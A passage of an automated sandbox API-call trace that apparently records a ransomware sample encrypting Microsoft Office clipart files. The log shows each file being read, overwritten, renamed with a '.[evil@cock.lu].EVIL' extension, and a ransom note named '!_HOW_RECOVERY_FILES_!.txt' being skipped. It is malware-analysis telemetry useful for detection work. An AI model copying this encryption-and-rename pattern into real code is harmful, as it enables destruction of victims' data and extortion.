returned 0x0 [0126.132] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x29a0, lpOverlapped=0x0) returned 1 [0126.132] CloseHandle (hObject=0x1a8) returned 1 [0126.132] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.132] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.132] __uncaught_exception () returned 0x84b1160800 [0126.132] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.133] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf.[evil@cock.lu].evil")) returned 1 [0126.133] ??_V@YAXPEAX@Z () returned 0x1 [0126.137] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF", dwFileAttributes=0x200) returned 0 [0126.137] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.137] wcsstr (_Str="HH00625_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.137] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 69 [0126.137] wcscmp (_String1="HH00625_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.137] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00625_.WMF") returned 0x0 [0126.137] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 0x45 [0126.137] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.140] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x844, lpOverlapped=0x0) returned 1 [0126.184] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.184] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.184] _errno () returned 0x84b1160840 [0126.184] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.184] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x860, lpOverlapped=0x0) returned 1 [0126.184] CloseHandle (hObject=0x1a8) returned 1 [0126.184] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.185] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.185] __uncaught_exception () returned 0x84b1160800 [0126.185] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.185] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf.[evil@cock.lu].evil")) returned 1 [0126.186] ??_V@YAXPEAX@Z () returned 0x1 [0126.189] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF", dwFileAttributes=0x200) returned 0 [0126.190] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.190] wcsstr (_Str="HH00636_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.190] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 69 [0126.190] wcscmp (_String1="HH00636_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.190] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00636_.WMF") returned 0x0 [0126.190] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 0x45 [0126.190] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.192] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0126.204] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.205] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.205] _errno () returned 0x84b1160840 [0126.205] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.205] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x640, lpOverlapped=0x0) returned 1 [0126.205] CloseHandle (hObject=0x1a8) returned 1 [0126.205] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.205] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.205] __uncaught_exception () returned 0x84b1160800 [0126.205] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.206] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf.[evil@cock.lu].evil")) returned 1 [0126.207] ??_V@YAXPEAX@Z () returned 0x1 [0126.210] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF", dwFileAttributes=0x200) returned 0 [0126.210] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.210] wcsstr (_Str="HH00669_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.210] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 69 [0126.210] wcscmp (_String1="HH00669_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.210] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00669_.WMF") returned 0x0 [0126.210] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 0x45 [0126.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.213] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ce2, lpOverlapped=0x0) returned 1 [0126.233] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.234] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.234] _errno () returned 0x84b1160840 [0126.234] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.234] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d00, lpOverlapped=0x0) returned 1 [0126.234] CloseHandle (hObject=0x1a8) returned 1 [0126.234] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.234] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.234] __uncaught_exception () returned 0x84b1160800 [0126.235] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.235] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf.[evil@cock.lu].evil")) returned 1 [0126.236] ??_V@YAXPEAX@Z () returned 0x1 [0126.239] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF", dwFileAttributes=0x200) returned 0 [0126.239] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.239] wcsstr (_Str="HH00681_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.239] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 69 [0126.239] wcscmp (_String1="HH00681_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.239] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00681_.WMF") returned 0x0 [0126.239] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 0x45 [0126.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.242] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2454, lpOverlapped=0x0) returned 1 [0126.245] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.245] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.245] _errno () returned 0x84b1160840 [0126.245] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.245] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2460, lpOverlapped=0x0) returned 1 [0126.245] CloseHandle (hObject=0x1a8) returned 1 [0126.245] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.246] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.246] __uncaught_exception () returned 0x84b1160800 [0126.246] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.246] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf.[evil@cock.lu].evil")) returned 1 [0126.247] ??_V@YAXPEAX@Z () returned 0x1 [0126.250] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF", dwFileAttributes=0x200) returned 0 [0126.251] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.251] wcsstr (_Str="HH00685_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.251] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 69 [0126.251] wcscmp (_String1="HH00685_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.251] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00685_.WMF") returned 0x0 [0126.251] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 0x45 [0126.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.253] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfc0, lpOverlapped=0x0) returned 1 [0126.266] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.266] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.266] _errno () returned 0x84b1160840 [0126.266] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.266] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfe0, lpOverlapped=0x0) returned 1 [0126.266] CloseHandle (hObject=0x1a8) returned 1 [0126.267] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.267] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.267] __uncaught_exception () returned 0x84b1160800 [0126.267] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.267] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf.[evil@cock.lu].evil")) returned 1 [0126.268] ??_V@YAXPEAX@Z () returned 0x1 [0126.270] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF", dwFileAttributes=0x200) returned 0 [0126.270] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.706] wcsstr (_Str="HH00687_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.706] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 69 [0126.706] wcscmp (_String1="HH00687_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.706] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00687_.WMF") returned 0x0 [0126.706] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 0x45 [0126.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.708] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10f4, lpOverlapped=0x0) returned 1 [0126.717] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.717] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.717] _errno () returned 0x84b1160840 [0126.717] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.717] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1100, lpOverlapped=0x0) returned 1 [0126.717] CloseHandle (hObject=0x1a8) returned 1 [0126.717] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.718] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.718] __uncaught_exception () returned 0x84b1160800 [0126.718] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.718] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf.[evil@cock.lu].evil")) returned 1 [0126.719] ??_V@YAXPEAX@Z () returned 0x1 [0126.722] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF", dwFileAttributes=0x200) returned 0 [0126.722] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.722] wcsstr (_Str="HH00688_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.722] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 69 [0126.722] wcscmp (_String1="HH00688_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00688_.WMF") returned 0x0 [0126.722] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 0x45 [0126.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.725] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bac, lpOverlapped=0x0) returned 1 [0126.727] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.727] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.728] _errno () returned 0x84b1160840 [0126.728] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.728] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bc0, lpOverlapped=0x0) returned 1 [0126.728] CloseHandle (hObject=0x1a8) returned 1 [0126.728] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.728] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.728] __uncaught_exception () returned 0x84b1160800 [0126.728] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.728] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf.[evil@cock.lu].evil")) returned 1 [0126.729] ??_V@YAXPEAX@Z () returned 0x1 [0126.732] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF", dwFileAttributes=0x200) returned 0 [0126.733] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.733] wcsstr (_Str="HH00693_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.733] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 69 [0126.733] wcscmp (_String1="HH00693_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.733] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00693_.WMF") returned 0x0 [0126.733] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 0x45 [0126.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.735] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bba, lpOverlapped=0x0) returned 1 [0126.738] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.738] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.738] _errno () returned 0x84b1160840 [0126.738] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.738] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bc0, lpOverlapped=0x0) returned 1 [0126.738] CloseHandle (hObject=0x1a8) returned 1 [0126.738] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft 